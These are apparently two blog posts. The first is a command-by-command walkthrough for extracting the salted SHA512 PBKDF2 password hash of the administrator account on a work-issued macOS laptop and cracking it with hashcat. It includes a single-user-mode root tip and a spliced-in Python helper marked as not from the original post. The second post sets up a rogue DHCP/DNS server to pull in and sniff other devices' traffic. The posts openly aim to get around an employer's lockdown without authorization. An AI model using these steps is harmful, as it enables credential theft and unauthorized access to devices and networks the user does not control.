Extracting and cracking MacOSX SHA512 passwords

Long story short, I love my fiance though she may be somewhat lacking in the technical area. She’s got a work-issued laptop with a built-in “Administrator” account that has locked down parts of the machine we want access to. So how to get in?

A nice post on apple stackexchange here helped me understand how the password encryption works on the backend (it’s SHA512), as well as rip out a pretty plist file with the hashed password data and get it ready for cracking. From there I’ll use my favorite cracker hashcat to break the actual password.

I’ve already been able to create a sudo-able account on this machine (this I finagled some time back when one of the “tech support guys” was helping us out and he made a little mistake). Outside of the scope of this article, but if you don’t have sudo locally you might be able to boot into single-user mode, which will give you root, by powering off your machine and holding down command+s as it boots back up.

Back to attacking the hash: what I need are the three essential parts of the SHA512 hash:
$ml$iterations(int)$salt(hex)$entropy(hex)

All of these are stored in the user’s ShadowHashData, so I just sudo -i to get a root prompt and pull the ShadowHashData this way:

thebox:~ root# defaults read /var/db/dslocal/nodes/Default/users/administrator.plist ShadowHashData > hexcode

This returns a big hex chunk of data to hexcode which, with a bit of prodding, will give me all three magic bits needed to run a dictionary attack on the password:

(<62706c69 73743030 d101025f 10145341 4c544544 2d534841 3531322d 50424b44 4632d303 04050607 0857656e 74726f70 79547361 6c745a69 74657261 74696f6e 734f1080 3d912bed 387aab30 ad2ce4b4 c37aefa0 3d7dbee0 5ffd0c03 e279674f 60491429 d31303d3 67f1f644 12611459 08e35c41 a9cce934 d394e092 683928b5 b827859d 8b5c8c7f 772b2bc9 b8592987 bfc8b6b5 15476922 f6878ffc ced141b6 1118d173 38f2adc0 0bad4ddb 182b0977 8aeeed1e e4ed479e 8b79d38d 855b5d95 841cbdc4 4f10200a 20f6e408 ad8596ed 4243fc07 75e07d28 aacdd29d fa4ad3e6 3fb3dfd4 08ab0311 7b39080b 22293136 41c4e700 00000000 00010100 00000000 00000900 00000000 00000000 00000000 0000ea>)

First we strip that down to the useful parts using some CLI manipulation:
cat hexcode | tr -dc 0-9a-f > trimmed

which gives us a file, trimmed, containing only the hex digits (the angle brackets, parentheses and spaces are stripped).

Next, we need to take that hex and turn it into incomprehensible binary.

The nuances of this and the next step escape me somewhat, as I’m not yet familiar enough with OSX and/or cryptographic schemes in general to understand the under-the-hood workings. I can only assume that the hexdump and its binary format are intrinsic to the process, and treat them as a black box. To get the binary version into a new file, hexbin:

xxd -r -p trimmed hexbin

Once you’ve got those bits, you can run another neat little OSX native command to make a human-readable plist:

plutil -convert xml1 hexbin -o admin.plist

And voila, finally getting something we can work with in admin.plist:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>SALTED-SHA512-PBKDF2</key>
<dict>
<key>entropy</key>
<data>
PZEr7Th6qzCtLOS0w3rvoD19vuBf/QwD4nlnT2BJFCnTEwPTZ/H2RBJhFFkI
41xBqczpNNOU4JJoOSi1uCeFnYtcjH93KyvJuFkph7/ItrUVR2ki9oeP/M7R
QbYRGNFzOPKtwAutTdsYKwl3iu7tHuTtR56LedONhVtdlYQcvcQ=

</data>
<key>iterations</key>
<integer>31545</integer>
<key>salt</key>
<data>
CiD25AithZbtQkP8B3XgfSiqzdKd+krT5j+z39QIqwM=
</data>
</dict>
</dict>
</plist>

With this we have an iteration integer, and, in base64 again, the entropy and salt values.

Remember, our end goal is to get a hashcat-readable hash that I can let my machine run amok against with a password list of some sort. We’re here now:

$ml$31545$salt(hex)$entropy(hex)

salt in b64: CiD25AithZbtQkP8B3XgfSiqzdKd+krT5j+z39QIqwM=
entropy in b64: PZEr7Th6qzCtLOS0w3rvoD19vuBf/QwD4nlnT2BJFCnTEwPTZ/H2RBJhFFkI41xBqczpNNOU4JJoOSi1uCeFnYtcjH93KyvJuFkph7/ItrUVR2ki9oeP/M7RQbYRGNFzOPKtwAutTdsYKwl3iu7tHuTtR56LedONhVtdlYQcvcQ=

So, for our purposes we need to convert those b64 salt and entropy values out of b64 and into their original binary format. Furthermore, we need them in hex to be able to work with them.
Let’s quicken the pace and do it in a single command for each:
echo CiD25AithZbtQkP8B3XgfSiqzdKd+krT5j+z39QIqwM= | base64 -D | xxd -p | tr -d \\n > salthex
echo PZEr7Th6qzCtLOS0w3rvoD19vuBf/QwD4nlnT2BJFCnTEwPTZ/H2RBJhFFkI41xBqczpNNOU4JJoOSi1uCeFnYtcjH93KyvJuFkph7/ItrUVR2ki9oeP/M7RQbYRGNFzOPKtwAutTdsYKwl3iu7tHuTtR56LedONhVtdlYQcvcQ= | base64 -D | xxd -p | tr -d \\n > entropyhex

This gives me a salt hex of 0a20f6e408ad8596ed4243fc0775e07d28aacdd29dfa4ad3e63fb3dfd408ab03
and an entropy hex of 3d912bed387aab30ad2ce4b4c37aefa03d7dbee05ffd0c03e279674f60491429d31303d367f1f6441261145908e35c41a9cce934d394e092683928b5b827859d8b5c8c7f772b2bc9b8592987bfc8b6b515476922f6878ffcced141b61118d17338f2adc00bad4ddb182b09778aeeed1ee4ed479e8b79d38d855b5d95841cbdc4

Now I can complete my hash string:
$ml$31545$0a20f6e408ad8596ed4243fc0775e07d28aacdd29dfa4ad3e63fb3dfd408ab03$3d912bed387aab30ad2ce4b4c37aefa03d7dbee05ffd0c03e279674f60491429d31303d367f1f6441261145908e35c41a9cce934d394e092683928b5b827859d8b5c8c7f772b2bc9b8592987bfc8b6b515476922f6878ffcced141b61118d17338f2adc00bad4ddb182b09778aeeed1ee4ed479e8b79d38d855b5d95841cbdc4

I write this to a little file, let’s say “machash”, and fire up hashcat, specifying hash type 7100.
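As an added example (not code from the original post), here is the whole chain above in Python: the hex blob that defaults read returns is a binary plist (its first bytes, 62706c6973743030, spell bplist00), so plistlib reads it directly, and the entropy field is PBKDF2-HMAC-SHA512 over the password with the salt and iteration count, which is also what the OS recomputes to check a login. The plist text is a constructed copy of admin.plist above; derive_entropy and verify_password are names I chose.

```python
import hashlib
import hmac
import plistlib

# Constructed copy of the admin.plist shown above (XML form of the ShadowHashData blob).
# The raw "defaults read" output is a binary plist; plistlib.loads() reads that form too.
ADMIN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
<key>SALTED-SHA512-PBKDF2</key>
<dict>
<key>entropy</key>
<data>
PZEr7Th6qzCtLOS0w3rvoD19vuBf/QwD4nlnT2BJFCnTEwPTZ/H2RBJhFFkI
41xBqczpNNOU4JJoOSi1uCeFnYtcjH93KyvJuFkph7/ItrUVR2ki9oeP/M7R
QbYRGNFzOPKtwAutTdsYKwl3iu7tHuTtR56LedONhVtdlYQcvcQ=
</data>
<key>iterations</key>
<integer>31545</integer>
<key>salt</key>
<data>
CiD25AithZbtQkP8B3XgfSiqzdKd+krT5j+z39QIqwM=
</data>
</dict>
</dict>
</plist>
"""

def parse_shadow_hash(plist_bytes):
    """Return (iterations, salt, entropy) from a ShadowHashData plist, XML or binary."""
    rec = plistlib.loads(plist_bytes)["SALTED-SHA512-PBKDF2"]
    return rec["iterations"], bytes(rec["salt"]), bytes(rec["entropy"])

def hashcat_line(iterations, salt, entropy):
    """The same $ml$ string the shell pipeline above builds by hand (hashcat mode 7100)."""
    return "$ml$%d$%s$%s" % (iterations, salt.hex(), entropy.hex())

def derive_entropy(password, salt, iterations, length=128):
    """PBKDF2-HMAC-SHA512: this is the 'black box' behind the 128-byte entropy field."""
    return hashlib.pbkdf2_hmac("sha512", password.encode(), salt, iterations, dklen=length)

def verify_password(candidate, iterations, salt, entropy):
    """What the OS does at login: re-derive the key and compare in constant time."""
    return hmac.compare_digest(derive_entropy(candidate, salt, iterations, len(entropy)), entropy)

if __name__ == "__main__":
    print(hashcat_line(*parse_shadow_hash(ADMIN_PLIST)))
```

The 31545 iterations are the per-guess cost that hashcat has to pay, which is why the iteration count matters more to the defender than the hash algorithm itself.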

Setting up a local DNS/DHCP Server on Windows 7… and accidentally bringing down your home network

Because, why not?

I want my network to ask my main box about DNS first, then fall back to the default. While writing this I discovered it will have awesome implications for virtualization, and it is even rewarding when seeking vulnerabilities on all systems attached to your access point! So I’m including some fun around that here. Let’s do it.

After a bit of searching I found this promising looking, free, open-source DHCP and DNS server: http://sourceforge.net/projects/dhcp-dns-server/files/Dual DHCP DNS Server/ (I’m definitely checking out the source later, it’s in C++!). I’ve played with this bad-boy for about 30 mins and it’s a lot of fun, super simple to set up, and will be helpful for a variety of network screwing-around in the future.

After the install (I made mine a Windows service, but feel free to do it your own way), we need to make some tweaks to an ini file that will control our server. I’ll let you set up your own routers to give your machine a static internal IP; to get Windows to follow suit, just change the properties of your network adapter like so:

[Screenshot: StaticIP]
This tells our ethernet connection to check with my machine for DNS requests, and solidifies our machine’s address on the local network at .147.
Before starting the service, I’ll make a few small changes in the DualServer.ini config file to add my now static internal IP under the [LISTEN_ON] section.

[Screenshot: Dual_Listen_On]
And create a fake DNS entry that routes back to my machine:

[Screenshot: DNS_HOSTS]
Yea okay, so how is that any different than a hosts file? Well, I can now tell my entire network to route their DNS through me, and establish myself as the all-knowing. Furthermore, I can learn a lot about what’s going on within my network if I disable DHCP entirely on my router and wireshark it to grab useful information on every device within my network. Kinda cool.

[Screenshot: Disable_DHCP]

[Screenshot: packet_assault]

It was after I disabled the DHCP function on my router and enabled it on my main box that things started to get interesting. Suddenly an ocean of data that I shouldn’t have been receiving was being routed to me. I haven’t done enough research into why this happened, or if it should have, but once I saw this I was gleeful to say the least. Not only my wired devices were affected, but both of the cell phones that were connected to my WiFi started spazzing out as well.

The icing on the cake was the behavior I was actually looking for: my VM started ignoring my home router and barreling my PC with data. Was my machine under attack by my network, or had I just stumbled onto something interesting?

I almost immediately started looking for a way to harness this, and found that there’s a “Windows Server” feature called “Routing and Remote Access”. I read in more than one place that this isn’t possible under Windows 7, but then I stumbled across a lot of people who said it was. Just one way to find out?

As it turns out, if you’re running Windows 7 Ultimate (as I am) you can actually turn your machine into a router by tweaking some registry values. More on this interesting development in my next post! Try not to break the internets.